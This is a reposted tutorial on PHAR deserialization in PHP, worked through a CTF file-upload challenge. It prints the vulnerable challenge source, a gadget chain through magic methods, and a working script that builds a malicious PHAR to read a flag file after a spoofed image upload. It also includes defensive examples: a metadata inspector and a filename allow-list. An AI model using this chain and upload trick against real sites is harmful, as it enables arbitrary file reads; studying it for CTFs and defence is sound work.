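PHP Development Techniques: PHAR Deserialization Explained

Introduction

A previous article covered the basics of PHP deserialization. This one moves on to a more advanced topic, PHAR deserialization, a technique I have often run into in CTF competitions. We start with the background knowledge it requires.

Prerequisites

PHAR

In software, a PHAR (PHP Archive) file is a packaging format that bundles many PHP code files and other resources (images, style sheets and so on) into a single archive so that applications and libraries can be distributed. A phar file is essentially a kind of compressed archive, and it stores user-defined meta-data in serialized form. When an affected file-operation function accesses a phar file, the contents of the meta-data are unserialized automatically, and that is the point where the deserialization vulnerability can be exploited.

Next, let's look at how to build a phar file:

PHAR support is read-only by default. Creating a Phar file requires allowing Phar files to be written, which means changing one setting:

; php.ini (the PHP version must be 5.2 or later)
phar.readonly = Off

Here php.ini is PHP's configuration file.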

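PHAR file structure

With the basic definition of phar covered, let's look at the basic structure of a PHAR file:

A stub

The marker that identifies a phar file. It looks like this:

xxx<?php xxx; __HALT_COMPILER();?>

Note that the stub must always end with __HALT_COMPILER();?> for the file to be recognized as a PHAR file.

A manifest describing the contents

Stores the user-defined meta-data in serialized form. This is the part the deserialization vulnerability relies on.

The file contents

The compressed file contents.

Signature

The signature information, placed at the end of the file.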
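
An added example (not from the original article): the stub-then-manifest layout described above is enough to check an uploaded file for PHAR metadata by byte parsing alone, without ever calling unserialize(). The function names, the sample bytes and the Demo class are constructed for illustration, and only the native PHAR layout is handled, not tar- or zip-based archives.

```php
<?php
// Added example: report what a PHAR manifest would hand to unserialize(),
// using only byte parsing.

/**
 * Returns null when $bytes holds no native PHAR manifest; otherwise the file
 * count, the metadata length and the class names named in the metadata.
 */
function inspect_phar_upload(string $bytes): ?array
{
    $token = '__HALT_COMPILER();';
    $pos = strpos($bytes, $token);
    if ($pos === false) {
        return null;                          // no stub, not a PHAR
    }
    $off = $pos + strlen($token);

    /* The stub may finish with a PHP closing tag and one line break. */
    $tail = substr($bytes, $off, 3);
    if ($tail === ' ?>' || $tail === "\n?>") {
        $off += 3;
    }
    if (substr($bytes, $off, 2) === "\r\n") {
        $off += 2;
    } elseif (substr($bytes, $off, 1) === "\n") {
        $off += 1;
    }

    // Manifest header, little-endian: manifest length (4), file count (4),
    // API version (2), global flags (4), alias length (4).
    if (strlen($bytes) < $off + 18) {
        return null;
    }
    $h = unpack('Vlen/Vfiles/vapi/Vflags/Valias', substr($bytes, $off, 18));
    $off += 18 + $h['alias'];                 // skip the alias string

    // Metadata: a 4-byte length followed by the serialized value.
    if ($h['alias'] > $h['len'] || strlen($bytes) < $off + 4) {
        return null;
    }
    $metaLen = unpack('V', substr($bytes, $off, 4))[1];
    $meta = (string) substr($bytes, $off + 4, $metaLen);
    if ($metaLen > $h['len'] || strlen($meta) !== $metaLen) {
        return null;                          // lengths do not fit the manifest
    }

    // Object tokens look like O:<len>:"Class" (C: for Serializable classes).
    preg_match_all('/(?<![A-Za-z0-9_])[OC]:\d+:"([^"]+)"/', $meta, $m);

    return [
        'files'          => $h['files'],
        'metadata_bytes' => $metaLen,
        'classes'        => array_values(array_unique($m[1])),
    ];
}

// Constructed sample: placeholder bytes standing in for image data, a stub,
// and a manifest whose metadata is a serialized object of a made-up class.
function build_constructed_sample(): string
{
    $meta = 'O:4:"Demo":1:{s:4:"name";s:4:"XINO";}';
    $body = pack('V', 0)                      // file count
          . "\x11\x00"                        // API version bytes
          . pack('V', 0)                      // global flags
          . pack('V', 0)                      // alias length (no alias)
          . pack('V', strlen($meta)) . $meta;
    return "\x00IMAGE-BYTES\x00<?php __HALT_COMPILER(); ?>\r\n"
         . pack('V', strlen($body)) . $body;
}

$report = inspect_phar_upload(build_constructed_sample());
echo json_encode($report), PHP_EOL;
echo json_encode(inspect_phar_upload("\x00IMAGE-BYTES\x00")), PHP_EOL;

// Upload policy sketch: an image upload that yields a report is refused.
if ($report !== null && $report['classes'] !== []) {
    echo "reject: serialized objects in PHAR metadata: ",
         implode(', ', $report['classes']), PHP_EOL;
}
```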

PHAR file generation example

With the above in hand, we can try generating a PHAR file. Sample code:

<?php
    class User {
        public $name;
    }
    @unlink("XINO.phar");
    $phar = new Phar("XINO.phar");
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>");
    $o = new User();
    $o->name = "XINO";
    $phar->setMetadata($o);   // stored in the manifest in serialized form
    $phar->addFromString("test.txt", "test");
    $phar->stopBuffering();
?>

Running it gives the following result:

A phar file named XINO.phar is generated successfully. Open it in 010editor:

The serialized meta-data has been saved into the file. All that remains is to read it through the phar protocol. One thing to note: a number of file functions unserialize the meta-data when they parse a phar file through the phar:// pseudo-protocol, for example:

fileatime    filectime        filemtime    file_exists    file_get_contents    file_put_contents
file         filegroup        fopen        fileinode      fileowner            fileperms
is_dir       is_file          is_link      is_executable  is_readable          is_writeable
is_writable  parse_ini_file   copy         unlink         stat                 readfile        finfo_file

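Hands-on

With the material above covered, we can try it in practice. First, the conditions for exploitation:

The phar file must be uploadable to the server

There must be a usable magic method to act as a "springboard"

The argument of a file-operation function must be controllable, and special characters such as :, / and phar must not be filtered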
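
An added example (not part of the challenge source or the original article) of closing off the third condition: the user-supplied name is matched against an allow-list and resolved inside a per-user directory before any file function sees it. The function name resolve_in_sandbox, the sample inputs and the temporary directory are constructed for illustration.

```php
<?php
// Added example (not from the original challenge source).

// If the application never loads PHAR archives, drop the wrapper entirely so
// that no file function can reach phar:// paths in this request.
if (in_array('phar', stream_get_wrappers(), true)) {
    stream_wrapper_unregister('phar');
}

/**
 * Map a user-supplied name to a regular file directly inside $sandbox.
 * Returns the canonical path, or null when the name is not acceptable.
 */
function resolve_in_sandbox(string $sandbox, string $name): ?string
{
    // Allow-list: a bare file name. No ":" (scheme), no "/" or "\" (path),
    // no leading dot, bounded length.
    if (!preg_match('/\A[A-Za-z0-9_-][A-Za-z0-9._-]{0,63}\z/', $name)) {
        return null;
    }
    $base = realpath($sandbox);
    if ($base === false) {
        return null;
    }
    // realpath() works on the local filesystem only and resolves symlinks,
    // so the result can be compared against the sandbox directory.
    $path = realpath($base . DIRECTORY_SEPARATOR . $name);
    if ($path === false || dirname($path) !== $base || !is_file($path)) {
        return null;
    }
    return $path;
}

// Demonstration on a constructed sandbox directory.
$sandbox = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'sandbox_' . bin2hex(random_bytes(4));
mkdir($sandbox, 0700);
file_put_contents($sandbox . DIRECTORY_SEPARATOR . 'report.txt', 'test');

$inputs = [
    'report.txt',                    // ordinary uploaded file
    'phar://avatar.gif/test.txt',    // wrapper path, as in condition three
    '../class.php',                  // traversal out of the sandbox
    'missing.txt',                   // well-formed name, no such file
];
foreach ($inputs as $input) {
    $path = resolve_in_sandbox($sandbox, $input);
    printf("%-28s => %s\n", $input, $path === null ? 'rejected' : 'accepted');
}

unlink($sandbox . DIRECTORY_SEPARATOR . 'report.txt');
rmdir($sandbox);
```

On PHP 8.0 and later the file functions no longer unserialize PHAR metadata automatically (only an explicit Phar::getMetadata() call does), but the name check is still worth keeping because it also stops path traversal.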

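Let's look at an example challenge:

The entry page is a login form. After registering and logging in, we find a file upload feature. Only gif/jpg/png file types are accepted, so the request has to be intercepted and its Content-Type changed to image/jpeg or the corresponding string for another image format. Intercepting the traffic also shows that the POST parameter at download allows arbitrary file download:

Download the source code: index.php, delete.php, download.php, class.php

class.php: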

<?php
error_reporting(0);
$dbaddr = "127.0.0.1";
$dbuser = "root";
$dbpass = "root";
$dbname = "dropbox";
$db = new mysqli($dbaddr, $dbuser, $dbpass, $dbname);
class User {
    public $db;
    public function __construct() {
        global $db;
        $this->db = $db;
    }
    public function user_exist($username) {
        $stmt = $this->db->prepare("SELECT `username` FROM `users` WHERE `username` = ? LIMIT 1;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->store_result();
        $count = $stmt->num_rows;
        if ($count === 0) {
            return false;
        }
        return true;
    }
    public function add_user($username, $password) {
        if ($this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("INSERT INTO `users` (`id`, `username`, `password`) VALUES (NULL, ?, ?);");
        $stmt->bind_param("ss", $username, $password);
        $stmt->execute();
        return true;
    }
    public function verify_user($username, $password) {
        if (!$this->user_exist($username)) {
            return false;
        }
        $password = sha1($password . "SiAchGHmFx");
        $stmt = $this->db->prepare("SELECT `password` FROM `users` WHERE `username` = ?;");
        $stmt->bind_param("s", $username);
        $stmt->execute();
        $stmt->bind_result($expect);
        $stmt->fetch();
        if (isset($expect) && $expect === $password) {
            return true;
        }
        return false;
    }
    // Runs when the object is destroyed and calls close() on whatever $db holds
    public function __destruct() {
        $this->db->close();
    }
}
class FileList {
    private $files;
    private $results;
    private $funcs;
    public function __construct($path) {
        $this->files = array();
        $this->results = array();
        $this->funcs = array();
        $filenames = scandir($path);
        $key = array_search(".", $filenames);
        unset($filenames[$key]);
        $key = array_search("..", $filenames);
        unset($filenames[$key]);
        foreach ($filenames as $filename) {
            $file = new File();
            $file->open($path . $filename);
            array_push($this->files, $file);
            $this->results[$file->name()] = array();
        }
    }
    // Any method FileList does not define is forwarded to every File in $files
    public function __call($func, $args) {
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
            $this->results[$file->name()][$func] = $file->$func();
        }
    }
    // Prints every collected result as a table cell
    public function __destruct() {
        $table = '<div id="container" class="container"><div class="table-responsive"><table id="table" class="table table-bordered table-hover sm-font">';
        $table .= '<thead><tr>';
        foreach ($this->funcs as $func) {
            $table .= '<th scope="col" class="text-center">' . htmlentities($func) . '</th>';
        }
        $table .= '<th scope="col" class="text-center">Opt</th>';
        $table .= '</tr></thead><tbody>';
        foreach ($this->results as $filename => $result) {
            $table .= '<tr>';
            foreach ($result as $func => $value) {
                $table .= '<td class="text-center">' . htmlentities($value) . '</td>';
            }
            $table .= '<td class="text-center" filename="' . htmlentities($filename) . '"><a href="#" rel="external nofollow" class="download">下载</a> / <a href="#" rel="external nofollow" class="delete">删除</a></td>';
            $table .= '</tr>';
        }
        echo $table;
    }
}
class File {
    public $filename;
    public function open($filename) {
        $this->filename = $filename;
        if (file_exists($filename) && !is_dir($filename)) {
            return true;
        } else {
            return false;
        }
    }
    public function name() {
        return basename($this->filename);
    }
    public function size() {
        $size = filesize($this->filename);
        $units = array(' B', ' KB', ' MB', ' GB', ' TB');
        // Assumed reconstruction: the page source is cut off between "$i" and
        // "filename);". The loop bound, the return and the detele() header are inferred.
        for ($i = 0; $size >= 1024 && $i < 4; $i++) $size /= 1024;
        return round($size, 2) . $units[$i];
    }
    public function detele() {
        unlink($this->filename);
    }
    // Returns the file contents; reachable through FileList::__call
    public function close() {
        return file_get_contents($this->filename);
    }
}
?>
 
delete.php:

<?php
#delete.php
session_start();
if (!isset($_SESSION['login'])) {
    header("Location: login.php");
    die();
}
if (!isset($_POST['filename'])) {
    die();
}
include "class.php";
chdir($_SESSION['sandbox']);
$file = new File();
$filename = (string) $_POST['filename'];
// open() passes the user-supplied name to file_exists()
if (strlen($filename) < 40 && $file->open($filename)) {
    $file->detele();
    Header("Content-type: application/json");
    $response = array("success" => true, "error" => "");
    echo json_encode($response);
} else {
    Header("Content-type: application/json");
    $response = array("success" => false, "error" => "File not exist");
    echo json_encode($response);
}
?>

A brief analysis:

Create a User object whose db property is a FileList object, with the file name set to the path of the flag. When the User object is destroyed, the close method of db is called. FileList has no close method, so the __call magic method is triggered (see the earlier article if this is unfamiliar), which in turn runs the close method of the File object. From the destructor of the FileList class we can see that after close runs, the result stored in the results variable is appended to the table variable and printed, so the flag is printed ($this->filename = the flag file).

So we write a script that generates the PHAR file:

<?php
class User {
    public $db;
}
class File {
    public $filename;
}
class FileList {
    private $files;
    public function __construct() {
        $file = new File();
        $file->filename = "/flag.txt";
        $this->files = array($file);
    }
}
$a = new User();
$a->db = new FileList();
$phar = new Phar("XINO.phar"); // the file extension must be phar
$phar->startBuffering();
$phar->addFromString("exp.txt", "test"); // add a file to the archive
$phar->setStub("<?php __HALT_COMPILER(); ?>"); // set the stub
$phar->setMetadata($a); // store the custom meta-data in the manifest
// the signature is computed automatically
$phar->stopBuffering();
?>

After generating the file, change the PHAR file's file type and upload it, then read it through the PHAR protocol to get the flag.

Conclusion

This article covered the principle of the PHAR deserialization vulnerability and how it is applied in some detail. It may be hard to follow at first; approaching it with the same reasoning as the earlier PHP deserialization material helps. If you are interested, set up your own target machine to test on.
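This article was collected from the internet and does not represent the position of IT俱乐部. Please credit the source when reposting. https://www.2it.club/code/php/1428.html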